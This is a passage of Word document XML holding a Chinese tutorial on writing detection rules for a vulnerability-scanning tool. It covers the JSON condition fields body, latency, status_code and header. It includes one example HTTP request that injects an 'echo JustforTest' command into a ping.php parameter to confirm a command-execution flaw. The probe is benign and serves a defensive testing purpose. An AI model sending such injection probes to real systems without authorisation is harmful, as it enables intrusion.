    <w:p w14:paraId="3EE49762" w14:textId="65247B9C" w:rsidR="00985A8B" w:rsidRDefault="006E4760" w:rsidP="00985A8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击添加新的一行数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7658ECC0" w14:textId="14B8B844" w:rsidR="006E4760" w:rsidRDefault="006E4760" w:rsidP="00985A8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D81B5F7" wp14:editId="40C5425B">
            <wp:extent cx="5274310" cy="798830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1570077862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077862" name="图片 1" descr="图形用户界面, 文本, 应用程序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52A0" w14:textId="77777777" w:rsidR="006E4760" w:rsidRDefault="006E4760" w:rsidP="00985A8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在condition中存在四个基本判断条件与两个高级函数，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E08BC" w14:textId="6AE694B8" w:rsidR="006E4760" w:rsidRDefault="006E4760" w:rsidP="00985A8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>request中存在着一个高级函数（</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4760">
        <w:t>base64Decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF6ABBD" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="00985A8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043390BA" w14:textId="63FB91C6" w:rsidR="006E4760" w:rsidRPr="00A27972" w:rsidRDefault="006E4760" w:rsidP="00A055B3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> condition中四个基本判断条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62762DE3" w14:textId="00F6BED6" w:rsidR="006E4760" w:rsidRDefault="006E4760" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在codition中，要以</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4760">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的形式写四个基本判断条件</w:t>
      </w:r>
      <w:r w:rsidR="008C040F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AACEA35" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsi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040F" w14:paraId="7E74A76B" w14:textId="77777777" w:rsidTr="008C040F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D8248CD" w14:textId="77777777" w:rsidR="008C040F" w:rsidRPr="00E97F6B" w:rsidRDefault="008C040F" w:rsidP="008C040F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E97F6B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A2FB4D7" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="008C040F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>body</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="008C040F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>判断是否包含指定的字符串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23398A2D" w14:textId="0E96948F" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="008C040F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>latency</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="008C040F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>判断延时时间，多用于sql延时注入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1235204A" w14:textId="5528D7E0" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="008C040F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>status_code</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="008C040F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008C040F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网站状态码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，int类型使用时不需要</w:t>
            </w:r>
            <w:r>
              <w:t>””</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>号括起来,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70ADC343" w14:textId="15E80EE2" w:rsidR="008C040F" w:rsidRPr="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="008C040F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>header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判断网站的返回头</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="324AE65F" w14:textId="1AA85D7B" w:rsidR="008C040F" w:rsidRPr="008C040F" w:rsidRDefault="008C040F" w:rsidP="006E4760">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E97F6B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A39111A" w14:textId="54410397" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672E94CA" w14:textId="66F7FD20" w:rsidR="008C040F" w:rsidRPr="00A27972" w:rsidRDefault="008C040F" w:rsidP="00A27972">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> body</w:t>
      </w:r>
      <w:r w:rsidR="00AB61A5" w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>（关键字）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C8F3C" w14:textId="445870CD" w:rsidR="006B4C2D" w:rsidRPr="00A27972" w:rsidRDefault="006B4C2D" w:rsidP="00A27972">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.2.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 单个判断字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1036B55D" w14:textId="0F4F3379" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ody就是判断是否指定的字符比如使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15740C9A" w14:textId="65EAB848" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78ACA20E" wp14:editId="7621561C">
            <wp:extent cx="5274310" cy="3478530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1188150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505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515B" w14:textId="46041788" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若是命令执行这种漏洞，只需要判断</w:t>
      </w:r>
      <w:r w:rsidRPr="008C040F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个关键字的时候，我们只需要简单的写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6F041" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DDD9EB" w14:textId="2BC19A76" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“body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关键字”,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88616E" w14:textId="6E858054" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B4C2D">
        <w:t>status_cod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0</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F170C" w14:textId="1F5BA536" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFECED" w14:textId="490A3268" w:rsidR="008C040F" w:rsidRDefault="006B4C2D" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC举例，下面是某个框架的命令执行漏洞，我们使其输出POC关键字</w:t>
      </w:r>
      <w:r w:rsidRPr="006B4C2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>JustForTest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测是否存在关键字，如是返回</w:t>
      </w:r>
      <w:r w:rsidRPr="006B4C2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>JustForTest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就判断存在漏洞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040F" w14:paraId="4F0666B5" w14:textId="77777777" w:rsidTr="008C040F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7E0649" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>POST /php/ping.php HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C3CF5F" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Host: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47F759D6" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="773E36EA" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Accept: application/json, text/javascript, */*; q=0.01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28CD967C" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7212E70A" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A365C39" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="727CDEA1" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B75C438" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Content-Length: 43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FF56A64" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74FF5431" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B6D669D" w14:textId="0B558A78" w:rsidR="008C040F" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">jsondata%5Btype%5D=99&amp;jsondata%5Bip%5D=echo </w:t>
            </w:r>
            <w:r w:rsidRPr="006B4C2D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>J</w:t>
            </w:r>
            <w:r w:rsidRPr="006B4C2D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ustforTest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BE87301" w14:textId="52ED8D55" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="008C040F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>判断条件以JSON的形式编写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4C2D" w14:paraId="302061CF" w14:textId="77777777" w:rsidTr="006B4C2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69E0A525" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2C5F92" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "body": "</w:t>
            </w:r>
            <w:r w:rsidRPr="006B4C2D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>JustForTest</w:t>
            </w:r>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="435B49CB" w14:textId="77777777" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "status_code": 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A22989" w14:textId="202ABDD9" w:rsidR="006B4C2D" w:rsidRDefault="006B4C2D" w:rsidP="006B4C2D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1D0953A4" w14:textId="77777777" w:rsidR="00FB5A90" w:rsidRDefault="00FB5A90" w:rsidP="00FB5A90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7EF58E" w14:textId="77C6D111" w:rsidR="006B4C2D" w:rsidRPr="00A27972" w:rsidRDefault="006B4C2D" w:rsidP="00A27972">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2 多个判断字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70674CE0" w14:textId="50334846" w:rsidR="00DA5212" w:rsidRDefault="00DA5212" w:rsidP="00DA5212">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，有一些漏洞需要判断多个字符才比较保险，若是有多个字符，body字段里的值使用英文逗号隔开即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A50333" w14:textId="612BE8E6" w:rsidR="00DA5212" w:rsidRDefault="00DA5212" w:rsidP="00DA5212">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C929C77" wp14:editId="64D083C4">
            <wp:extent cx="3154953" cy="1440305"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="150713442" name="图片 1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13442" name="图片 1" descr="图形用户界面, 应用程序, Word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152D" w14:textId="52B1A6B8" w:rsidR="00DA5212" w:rsidRPr="00A27972" w:rsidRDefault="00DA5212" w:rsidP="00A27972">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2C99">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
